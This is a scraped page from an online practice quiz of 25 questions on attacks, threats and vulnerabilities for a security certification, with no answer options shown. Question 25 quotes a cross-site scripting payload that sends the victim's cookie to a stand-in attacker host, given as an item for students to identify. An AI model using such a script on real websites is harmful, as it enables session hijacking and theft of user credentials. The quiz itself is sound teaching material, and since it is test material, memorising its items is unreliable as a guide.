Quiz 1 of 0
Exam simulator: Attacks, Threats, and Vulnerabilities – Part A
Anastasia-Instructor August 30, 2022
Time limit: 0
Quiz Summary
0 of 25 Questions completed
Questions:
Information
You have already completed the quiz before. Hence you can not start it again.
Quiz is loading…
You must sign in or sign up to start the quiz.
You must first complete the following:
Results
Quiz complete. Results are being recorded.
Results
0 of 25 Questions answered correctly
Your time:
Time has elapsed
You have reached 0 of 0 point(s), (0)
Earned Point(s): 0 of 0, (0)
0 Essay(s) Pending (Possible Point(s): 0)
Categories
- Not categorized 0%
-
Unfortunately, you didn’t pass the quiz, but hey, you have unlimited access.😎
Practice makes you perfect! 👊 -
Congratulations! 🥳
You have passed the quiz successfully! You are one step closer to pass the real exam!
We hope to see you again on another certification path.✌️
Good luck with the exam! Stay strong.👊
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- Current
- Review
- Answered
- Correct
- Incorrect
-
Question 1 of 25
1. Question
Match the following social engineering techniques with their meaning.
Sort elements
- Phishing
- Smishing
- Vishing
- Spear phishing
-
An attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message
-
The user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile devices
-
Individuals are tricked into revealing critical financial or personal information to unauthorized entities through voice email or VoIP (voice over IP)
-
Is an email or electronic communications scam targeted towards a specific individual, organization or business.
CorrectIncorrect -
Question 2 of 25
2. Question
Which of the following types of social engineering techniques is the use of messaging systems to send an unsolicited message to large numbers of recipients for the purpose of commercial advertising, or for the purpose of non-commercial proselytizing?
CorrectIncorrect -
Question 3 of 25
3. Question
Which of the following types of social engineering is a method in which the attacker seeks to compromise a specific group of end-users by infecting websites that members of that group are known to visit?
CorrectIncorrect -
Question 4 of 25
4. Question
Answer the fill-in-the-blank by typing one of the following type of attacks:
Trojan
Ransomware
Worm
Spyware
-
The type of malicious code or software that looks legitimate but can take control of your computer is known as . It is designed to damage, disrupt, steal, or in general, inflict some other harmful action on your data or network.
CorrectIncorrect -
-
Question 5 of 25
5. Question
Which of the following attacks isn’t intended to steal data but to remain in place for as long as possible, quietly mining in the background?
CorrectIncorrect -
Question 6 of 25
6. Question
A method by which authorized and unauthorized users are able to get around normal security measures and gain high-level user access (root access) on a computer system, network, or software application is known as:
CorrectIncorrect -
Question 7 of 25
7. Question
Match the following password attack techniques with their meaning.
Sort elements
- Brute force attack
- Rainbow table attack
- Dictionary attack
- Plaintext Attack
-
An attacker submitting many passwords or passphrases with the hope of eventually guessing correctly
-
A type of hacking wherein the perpetrator tries to crack the passwords stored in a database system
-
A method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password
-
An attack model for cryptanalysis where the attacker has access to both the plaintext (called a crib), and its encrypted version (ciphertext).
CorrectIncorrect -
Question 8 of 25
8. Question
Which of the following attacks occurs when someone infiltrates a system through an outside partner or provider with access to the systems and data?
CorrectIncorrect -
Question 9 of 25
9. Question
Adversarial machine learning is a machine learning technique that attempts to fool models by supplying deceptive input. (True/False)
CorrectIncorrect -
Question 10 of 25
10. Question
Which of the following cryptographic attacks force victims to use older, more vulnerable versions of software in order to exploit known vulnerabilities against them?
CorrectIncorrect -
Question 11 of 25
11. Question
Which of the following attacks is known as URL hijacking?
CorrectIncorrect -
Question 12 of 25
12. Question
What type of attack is when an attacker takes over a regular user account on a network and attempts to gain administrative permissions?
CorrectIncorrect -
Question 13 of 25
13. Question
Given the following injection attacks, which one allows an attacker to interfere with the queries that an application makes to its database?
CorrectIncorrect -
Question 14 of 25
14. Question
Which of the following options are considered as request forgery attacks? (Choose all that apply)
CorrectIncorrect -
Question 15 of 25
15. Question
A member of the company asks for a financial transfer by sending an encrypted message to the financial administrator. An attacker eavesdrops on this message, captures it, and is now in a position to resend it. Because it’s an authentic message that has simply been resent, the message is already correctly encrypted and looks legitimate to the financial administrator. Then the financial administrator is likely to respond to this new request, that response could include sending a large sum of money to the attacker’s bank account.
Which of the following type of attack is described above?
CorrectIncorrect -
Question 16 of 25
16. Question
In which of the following API attacks does the attacker intercept communications between an API endpoint and a client in order to steal and/or alter the confidential data that is passed between them?
CorrectIncorrect -
Question 17 of 25
17. Question
There are two main techniques for driver manipulating: Shimming and Refactoring. Shiming is the process of changing a computer program’s internal structure without modifying its external functional behavior or existing functionality. (True/False)
CorrectIncorrect -
Question 18 of 25
18. Question
Answer the fill-in-the-blank by typing one of the following types of attacks:
Jamming
Disassociation
Bluesnarfing
Bluejacking
-
attacks are a subset of denial of service (DoS) attacks in which malicious nodes block legitimate communication by causing intentional interference in networks.
CorrectIncorrect -
-
Question 19 of 25
19. Question
In which of the following wireless network attacks the attacker set up a fraudulent Wi-Fi access point that appears to be legitimate but it is used to eavesdrop wireless communications?
CorrectIncorrect -
Question 20 of 25
20. Question
The attacker connects to a switch port and starts sending a very large number of Ethernet frames with a different fake source MAC address. The switch’s MAC address table becomes full and now it’s not able to save more MAC address, which means it enters into a fail-open mode and starts behaving like a network Hub. Frames are flooded to all ports, similar to a broadcast type of communication. The attacker’s machine will be delivered with all the frames between the victim and other machines. The attacker will be able to capture sensitive data from the network.
Given the above scenario, identify the Layer 2 type of attack.
CorrectIncorrect -
Question 21 of 25
21. Question
A company hired an outside contractor to oversee the cyber defense competition and adjudicate the event. Which of the following cybersecurity testing exercise team MOST likely been hired.
CorrectIncorrect -
Question 22 of 25
22. Question
You have been hired to investigate an activity from an attacker who compromised a host on the company’s network. The attacker used credentials from an employee to breach the system. After a while, he gained access to a Linux server and he started using
sudo
commands to perform malicious activities. What sort of attack the attacker used?CorrectIncorrect -
Question 23 of 25
23. Question
Which of the following threat actor terms is the act of breaking into a computer system, for politically or socially motivated purposes?
CorrectIncorrect -
Question 24 of 25
24. Question
Which of the following statements describes the difference between the Red team and the Blue team in a cybersecurity testing exercise?
CorrectIncorrect -
Question 25 of 25
25. Question
You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours to find out if the sites are compromised or not, you notice the following code snippet:
"http://www.client-website.com/search ? < script >location.href=' http://www.villainsite.com/hijacker.php?cookie= '+document.cookie; < / script >"
Which of the following attacks the attacker is trying to conduct on your client’s website?
CorrectIncorrect